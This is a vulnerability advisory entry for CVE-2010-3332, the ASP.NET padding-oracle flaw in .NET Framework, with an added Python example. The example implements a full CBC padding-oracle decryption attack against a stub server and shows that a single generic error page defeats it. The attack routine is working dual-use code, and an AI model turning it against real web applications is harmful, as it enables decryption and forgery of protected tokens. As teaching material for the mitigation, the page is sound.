PT-2010-4743 · Microsoft (+1) · .Net Framework (+1)

Juliano Rizzo (and 1 more)
·
Published 2010-09-22
·
Updated 2020-11-23
·
CVE-2010-3332
CVSS v2.0: 6.4 (Medium)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N
Affected software and versions: Microsoft .NET Framework 1.1 SP1 through 4.0
Description: When the .NET Framework decrypts ASP.NET data such as the __VIEWSTATE form field, a failed padding check during decryption is reported differently from other failures (improper error handling during padding verification). A remote attacker can therefore use the application as a padding oracle: by submitting modified ciphertexts and observing the error responses, the attacker decrypts data the server encrypted and can also construct ciphertexts of chosen content, i.e. tamper with it. This allows reading the view state and forging server-encrypted tokens such as cookies. On .NET Framework 3.5 SP1 and later the same oracle can additionally be used to retrieve the contents of any file within the ASP.NET application, including web.config.
Recommendations: For .NET Framework 1.1 SP1 through 4.0, install the update that fixes this issue (Microsoft Security Bulletin MS10-070). Until the update is applied, remove the oracle rather than the attack surface: configure the application so that every error, including a failed padding check, produces the same response (one generic custom error page for all errors, with no detailed error codes), so that a padding failure cannot be distinguished from any other failure. Additionally restrict access to sensitive files within the application, and avoid relying on VIEWSTATE form data for sensitive operations until the issue is resolved; note that these application-level measures reduce exposure but do not remove the framework defect.
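Worked example (added here; it is not part of the advisory and not Microsoft's code). The script reproduces the mechanism described above against a stub server and shows why the single-error-page workaround defeats it: when padding failures and MAC failures are answered differently, the attacker recovers the plaintext from the ciphertext alone, block by block and byte by byte; when every failure is the same generic error, the attack never gets a single accepted guess and aborts. The block cipher is a toy SHA-256 Feistel network standing in for AES (the attack does not depend on which cipher sits under CBC), and ViewStateServer, its keys, the fixed IV and the sample view-state string are all constructed for the example.

```python
# CBC padding-oracle decryption and the uniform-error fix.  Added example, not
# the advisory's code: the toy Feistel cipher and the server stub are assumptions.
import hashlib
import hmac

BLOCK = 16

class PaddingError(Exception):
    pass

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def feistel(key, blk, rounds):  # toy 16-byte block cipher standing in for AES
    l, r = blk[:8], blk[8:]
    for rnd in rounds:
        l, r = r, xor(l, hashlib.sha256(key + bytes([rnd]) + r).digest()[:8])
    return r + l  # encrypt with range(4); decrypt with range(3, -1, -1)

def pad(data):  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise PaddingError
    return data[:-n]

def cbc_encrypt(key, iv, pt):
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = feistel(key, xor(pt[i:i + BLOCK], prev), range(4))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += xor(feistel(key, ct[i:i + BLOCK], range(3, -1, -1)), prev)
        prev = ct[i:i + BLOCK]
    return out

class ViewStateServer:
    """Decrypt -> unpad -> check MAC.  leak_errors=True answers padding and
    MAC failures differently (the oracle); False returns one generic error."""
    def __init__(self, leak_errors):
        self.key = hashlib.sha256(b"constructed-server-key").digest()[:BLOCK]
        self.mac_key = b"constructed-mac-key"
        self.leak, self.queries = leak_errors, 0

    def _tag(self, data):
        return hmac.new(self.mac_key, data, hashlib.sha256).digest()[:8]

    def encrypt(self, data):  # fixed IV only so the example is reproducible
        iv = hashlib.sha256(b"constructed-iv").digest()[:BLOCK]
        return iv + cbc_encrypt(self.key, iv, pad(data + self._tag(data)))

    def handle(self, blob):
        self.queries += 1
        try:
            tagged = unpad(cbc_decrypt(self.key, blob[:BLOCK], blob[BLOCK:]))
        except PaddingError:
            return "padding error" if self.leak else "error"
        if not hmac.compare_digest(tagged[-8:], self._tag(tagged[:-8])):
            return "invalid mac" if self.leak else "error"
        return "ok"

def recover_block(padding_ok, prev, target):
    """Recover D(target) XOR prev from the last byte backwards; None if no
    forged block is ever accepted (i.e. there is no usable oracle)."""
    inter = bytearray(BLOCK)  # D_key(target), filled in from the right
    for pos in range(BLOCK - 1, -1, -1):
        padv = BLOCK - pos  # padding value forced onto bytes pos..15
        forged = bytearray(inter[j] ^ padv if j > pos else 0 for j in range(BLOCK))
        for guess in range(256):
            forged[pos] = guess
            if not padding_ok(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:  # a lucky 0x02 0x02 would break if byte 14 changed
                alt = forged[:-2] + bytes([forged[-2] ^ 0xFF, guess])
                if not padding_ok(bytes(alt) + target):
                    continue
            inter[pos] = guess ^ padv
            break
        else:
            return None
    return xor(bytes(inter), prev)

def padding_oracle_attack(server, blob):
    """Attacker side: sees only the ciphertext and the server's responses."""
    def padding_ok(ct):  # padding passed iff the server got as far as the MAC check
        return server.handle(ct) in ("ok", "invalid mac")
    blocks = [blob[i:i + BLOCK] for i in range(0, len(blob), BLOCK)]
    out = b""
    for prev, cur in zip(blocks, blocks[1:]):
        plain = recover_block(padding_ok, prev, cur)
        if plain is None:
            return None
        out += plain
    return unpad(out)[:-8]  # drop padding and the 8-byte tag
```

Against the leaking server, `padding_oracle_attack(srv, srv.encrypt(data))` returns `data` after at most 256 requests per byte (`srv.queries` counts them); against the server with `leak_errors=False` it returns None. The fix works only because the two failure paths become observably identical: if the generic page were returned faster for a padding failure than for a MAC failure, timing would reopen the oracle, which is why Microsoft's workaround for this advisory paired the single error page with a random delay.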

Exploit

Fix

Weakness Enumeration

CWE-209: Generation of Error Message Containing Sensitive Information

Related identifiers

CVE-2010-3332
SUSE-SU-2012_0393-1

Affected products

.Net Framework
Suse